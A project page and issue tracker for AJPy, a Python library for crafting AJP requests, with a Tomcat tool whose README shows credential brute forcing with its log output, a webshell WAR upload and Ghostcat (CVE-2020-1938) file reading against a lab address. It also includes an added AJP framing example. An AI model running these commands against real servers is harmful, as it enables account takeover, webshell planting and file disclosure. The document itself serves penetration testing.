
ajpy's Introduction

Intro

AJPy aims to craft AJP requests in order to communicate with AJP connectors.

Reference documentation: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html

Tools

At the moment, only one tool is provided for Tomcat with the following modules:

  • version fingerprint
$ python tomcat.py version 172.17.0.2
Apache Tomcat/8.0.35
  • authentication bruteforce
$ python tomcat.py -v  bf -U tomcat_mgr_default_users.txt -P tomcat_mgr_default_pass.txt /manager/html 172.17.0.2
[2016-06-10 17:24:55.965] INFO     Attacking a tomcat at ajp13://172.17.0.2:8009/manager/html
[2016-06-10 17:24:56.017] DEBUG    testing admin:admin
[2016-06-10 17:24:56.069] INFO     Found valid credz: admin:admin
[2016-06-10 17:24:56.069] INFO     Here is your cookie: JSESSIONID=1267BE97BFB5BFAEAFAAD76EE648FE06; Path=/manager/; HttpOnly
[2016-06-10 17:24:56.069] DEBUG    testing admin:manager
[2016-06-10 17:24:56.152] DEBUG    testing admin:role1
[2016-06-10 17:24:56.154] DEBUG    testing admin:root
[2016-06-10 17:24:56.155] DEBUG    testing admin:tomcat
[2016-06-10 17:24:56.157] DEBUG    testing manager:admin
[2016-06-10 17:24:56.158] DEBUG    testing manager:manager
[2016-06-10 17:24:56.159] DEBUG    testing manager:role1
[2016-06-10 17:24:56.160] DEBUG    testing manager:root
[2016-06-10 17:24:56.161] DEBUG    testing manager:tomcat
[2016-06-10 17:24:56.164] DEBUG    testing role1:admin
[2016-06-10 17:24:56.164] DEBUG    testing role1:manager
[2016-06-10 17:24:56.165] DEBUG    testing role1:role1
[2016-06-10 17:24:56.166] DEBUG    testing role1:root
[2016-06-10 17:24:56.167] DEBUG    testing role1:tomcat
[2016-06-10 17:24:56.169] DEBUG    testing root:admin
[2016-06-10 17:24:56.170] DEBUG    testing root:manager
[2016-06-10 17:24:56.171] DEBUG    testing root:role1
[2016-06-10 17:24:56.172] DEBUG    testing root:root
[2016-06-10 17:24:56.173] DEBUG    testing root:tomcat
[2016-06-10 17:24:56.175] DEBUG    testing tomcat:admin
[2016-06-10 17:24:56.175] DEBUG    testing tomcat:manager
[2016-06-10 17:24:56.176] DEBUG    testing tomcat:role1
[2016-06-10 17:24:56.177] DEBUG    testing tomcat:root
[2016-06-10 17:24:56.178] DEBUG    testing tomcat:tomcat
[2016-06-10 17:24:56.184] INFO     Found valid credz: tomcat:tomcat
[2016-06-10 17:24:56.184] INFO     Here is your cookie: JSESSIONID=9944126F31E428B8847AFEBF2307BB09; Path=/manager/; HttpOnly
[2016-06-10 17:24:56.184] DEBUG    testing tomcat:sstic2016
[2016-06-10 17:24:56.186] DEBUG    testing both:admin
[2016-06-10 17:24:56.187] DEBUG    testing both:manager
[2016-06-10 17:24:56.188] DEBUG    testing both:role1
[2016-06-10 17:24:56.189] DEBUG    testing both:root
[2016-06-10 17:24:56.190] DEBUG    testing both:tomcat
[2016-06-10 17:24:56.191] DEBUG    Closing socket...
  • WAR upload
$ python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
  • WAR undeploy
$ python tomcat.py undeploy -u tomcat -p tomcat /webshell 172.17.0.2
  • Application listing
$ python tomcat.py list -u tomcat -p tomcat 172.17.0.2
  • Reading file using CVE-2020-1938
$ python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2

Thanks

  • @MrTchuss for the Tomcat WAR upload fix
  • @kalidor for the Tomcat WAR undeploy and application listing

Contributors

fabaff, hypn0s, hypn0s-bb, kalidor, maraflush, mrtchuss

ajpy's Issues

Failed to get CSRF token.

This is the command I run in PowerShell:
python tomcat.py upload -u admin -p admin Linuxx.war 192.168.0.103

Traceback (most recent call last):
  File "tomcat.py", line 366, in <module>
    bf.upload(args.filename, args.user, args.password, args.old_version, args.headers)
  File "tomcat.py", line 177, in upload
    deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
TypeError: 'NoneType' object is not iterable

ConnectionRefusedError

Hi Julien

Thanks for the scripts. I am having a few issues while trying to use them, not sure if I am following the right steps.

Did not work code:
mymac:AJPy cd$ python tomcat.py version 10.2.2.11 --port 20022
usage: tomcat.py [-h] [--port PORT] [-v] {bf,upload,undeploy,version,list,read_file} ... target
tomcat.py: error: unrecognized arguments: 10.2.2.11 --port

mymac:AJPy cd$ python tomcat.py list 10.2.2.11
Traceback (most recent call last):
  File "tomcat.py", line 355, in <module>
    bf = Tomcat(args.target, args.port)
  File "tomcat.py", line 78, in __init__
    self.socket.connect((target_host, target_port))
ConnectionRefusedError: [Errno 61] Connection refused

This server was vulnerable but the script came back with no.

mymac:AJPy chandan$ python tomcat.py version 10.2.2.12
None

License unclear

Hi Julien,

I am about to package AJPy for Debian, but found out that the license of AJPy isn't well defined. The header in ajp.py looks like a BSD license, but since you didn't include it completely, I can't know if it's a BSD-2, 3 or 4 clause. Can you clarify this point?

Thanks for your work!

Create a pip package

Hey,

First off, great job.

Could you consider creating a pip package (and publishing it to PyPI) for your library so it can be reused in other tools? I'm mostly thinking of patator, for which it would not take a lot of effort to integrate and add AJP support.

Cheers

Bruteforce feature not compatible with Python 3

Oy!

The credentials bruteforce feature silently fails due to multiple operations in test_password expecting bytes instead of str.

For example:

def test_password(self, user, password):
    res = False
    stop = False
    self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + b64encode("%s:%s" % (user, password)).replace('\n', '')

b64encode is expecting bytes.

Add support to other application containers

A script should be able to handle the following application servers:

  • Apache Tomcat
  • Apache Geronimo
  • JBoss
  • Jetty
  • Oracle Glassfish
  • Oracle Application Server
  • Oracle WebLogic Server
  • Resin web server
  • IBM WebSphere
  • Adobe ColdFusion
  • WebObjects
  • SAP NetWeaver Application Server
  • Payara Server

Maybe create an ajpwn.py with modules.

Unable to read response content when HTTP_METHOD==POST.

Looking in the method send_and_receive() in AjpForwardRequest there are the lines:

		res = []
		i = socket.sendall(self.serialize())
		if self.method == AjpForwardRequest.POST:
			return res

Is there no way to read the payload response when performing a POST?

Two questions about read file

Hello, I have some questions for you.

First:

If I want to read a file in ROOT, what should I do?

For example:

a file is D:\ALL\javaidea\apache-tomcat-8.5.50-src\source\webapps\test.txt

Can I read this? I tried a lot, but I couldn't solve it. :(

Second: Can I read it in Spring Boot?

Also, I tried a lot, but I couldn't solve it. :(

Timeout error when using "read_file" functionality

Hey there!

I ran across this lib while looking for ways to check for the recent "Ghostcat" CVE. When trying to use the code (both as a lib and using the standalone tomcat.py script) to check for the vuln on a testing host, I encounter timeouts when waiting on a socket. Here's the stacktrace I get when running tomcat.py.

sh-3.2# python tomcat.py version <VULNERABLE HOSTNAME>
Apache Tomcat/8.5.32
sh-3.2# python tomcat.py read_file --webapp=manager /WEB-INF/web.xml <VULNERABLE HOSTNAME>
Traceback (most recent call last):
  File "tomcat.py", line 377, in <module>
    hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
  File "tomcat.py", line 153, in perform_request
    responses = self.forward_request.send_and_receive(self.socket, self.stream)
  File "/.../AJPy/ajpy/ajp.py", line 274, in send_and_receive
    r = AjpResponse.receive(stream)
  File "/.../AJPy/ajpy/ajp.py", line 380, in receive
    r.parse(stream)
  File "/.../AJPy/ajpy/ajp.py", line 337, in parse
    self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
  File "/.../AJPy/ajpy/ajp.py", line 44, in unpack
    buf = stream.read(size)
  File "/usr/local/Cellar/python/3.7.6_1/Frameworks/Python.framework/Versions/3.7/lib/python3.7/socket.py", line 589, in readinto
    return self._sock.recv_into(b)
TimeoutError: [Errno 60] Operation timed out

As you can see, I can get the server version correctly from the first call, so there's no issue with connectivity to the host. I'm on MacOS using Python version 3.7.6 (installed via homebrew). Any insight into what's up would be helpful.

Submit a bug

Hello, author. I found that you have a problem when matching the version: in the regular expression match, I do not know whether your space is intentional or unintentional, but in my practice I encountered the problem that the version does not match. It has now been removed and fixed.

run error

/AJPy/ajpy/ajp.py

kali2020.4
python 2.7.18

def unpack(stream, fmt):
    print stream, fmt
    size = struct.calcsize(fmt)
    print size
    buf = stream.read(size)
    print buf
    if "" in buf:
        print "error"
    return struct.unpack(fmt, buf)

<socket._fileobject object at 0x7f4b45690ad0> >HHb
5

error
Traceback (most recent call last):
  File "tomcat.py", line 378, in <module>
    hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
  File "tomcat.py", line 154, in perform_request
    responses = self.forward_request.send_and_receive(self.socket, self.stream)
  File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 279, in send_and_receive
    r = AjpResponse.receive(stream)
  File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 385, in receive
    r.parse(stream)
  File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 342, in parse
    self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
  File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 50, in unpack
    return struct.unpack(fmt, buf)
struct.error: unpack requires a string argument of length 5
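The packet framing that this traceback and the earlier "Timeout error" report both trip over, and that the intro describes AJPy as implementing, is small enough to show in full. What follows is an added example written for this page, not AJPy's own code and not a fix to it; it follows the AJPv13 wire format from the reference documentation linked in the intro (request magic 0x12 0x34, response magic "AB", a big-endian 16-bit length, then the prefix code as the first payload byte; CPing is prefix 10, CPong is prefix 9) and exercises a CPing/CPong exchange over an in-memory stream with constructed sample bytes. The function and class names (build_packet, build_cping, read_exact, read_packet, describe_response, AjpFramingError) and the 8192-byte packet bound are this example's own choices.

```python
"""AJP13 packet framing with short-read and magic checks (added example, not AJPy code)."""
import io
import struct

# Wire constants from the AJPv13 reference documentation linked in the intro.
REQUEST_MAGIC = b"\x12\x34"   # web server -> servlet container
RESPONSE_MAGIC = b"AB"        # servlet container -> web server
CPING = 10                    # request prefix code: connection health check
CPONG = 9                     # response prefix code: reply to CPing
MAX_PACKET = 8192             # assumed bound: the 8 KiB packet size the spec describes


class AjpFramingError(Exception):
    """Truncated input, bad magic, or an implausible length field."""


def build_packet(magic: bytes, payload: bytes) -> bytes:
    """Frame a payload as an AJP13 packet: magic, big-endian 16-bit length, payload."""
    if not 0 < len(payload) <= MAX_PACKET:
        raise ValueError("payload must be 1..%d bytes" % MAX_PACKET)
    return magic + struct.pack(">H", len(payload)) + payload


def build_cping() -> bytes:
    """The one-byte CPing request: 12 34 00 01 0a."""
    return build_packet(REQUEST_MAGIC, bytes([CPING]))


def read_exact(stream, size: int) -> bytes:
    """Read exactly `size` bytes or raise AjpFramingError on EOF.

    A short read must never reach struct.unpack: that is exactly how the
    'unpack requires a string argument of length 5' error above arises.
    """
    chunks, remaining = [], size
    while remaining:
        chunk = stream.read(remaining)
        if not chunk:
            raise AjpFramingError(
                "stream closed after %d of %d bytes" % (size - remaining, size))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def read_packet(stream, expected_magic: bytes = RESPONSE_MAGIC):
    """Read one packet; return (prefix_code, payload after the prefix byte).

    The magic is checked before the length field is trusted, so a peer
    that is not speaking AJP fails fast instead of the reader blocking
    on a length that will never be satisfied.
    """
    magic, length = struct.unpack(">2sH", read_exact(stream, 4))
    if magic != expected_magic:
        raise AjpFramingError("bad magic %r, expected %r" % (magic, expected_magic))
    if not 0 < length <= MAX_PACKET:
        raise AjpFramingError("implausible packet length %d" % length)
    payload = read_exact(stream, length)
    return payload[0], payload[1:]


def describe_response(response_bytes: bytes) -> str:
    """Classify raw bytes: 'cpong', 'prefix <n>', or 'framing error: <why>'."""
    try:
        prefix, rest = read_packet(io.BytesIO(response_bytes))
    except AjpFramingError as exc:
        return "framing error: %s" % exc
    if prefix == CPONG and not rest:
        return "cpong"
    return "prefix %d" % prefix


# Constructed sample responses (not captured from any real server).
GOOD_CPONG = b"AB\x00\x01\x09"                 # a healthy container answering CPing
TRUNCATED = b"AB\x00"                          # peer closed the connection mid-header
HTTP_REPLY = b"HTTP/1.1 400 Bad Request\r\n"   # an HTTP port answered, not AJP

if __name__ == "__main__":
    print("CPing request:", build_cping().hex())
    for sample in (GOOD_CPONG, TRUNCATED, HTTP_REPLY):
        print(repr(sample), "->", describe_response(sample))
```

Both failures on this page map onto the two checks in read_packet. The Python 2.7 trace above is the short-read case: read() returned fewer than the five bytes the ">HHb" format needs, and struct.unpack was handed the short buffer; read_exact reports how many bytes actually arrived instead. The macOS trace in the "Timeout error" issue is the other case, a read that blocks on bytes that never come and ends in an OS-level TimeoutError; a per-socket timeout set with socket.settimeout() bounds that wait, and the magic check turns a non-AJP reply into an immediate framing error rather than a long hang.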

Fix POST method support

Add support for the POST method in order to upload a webshell WAR through the Tomcat manager.

Currently, the WAR upload fails with the following error:

FAIL - Invalid context path null was specified
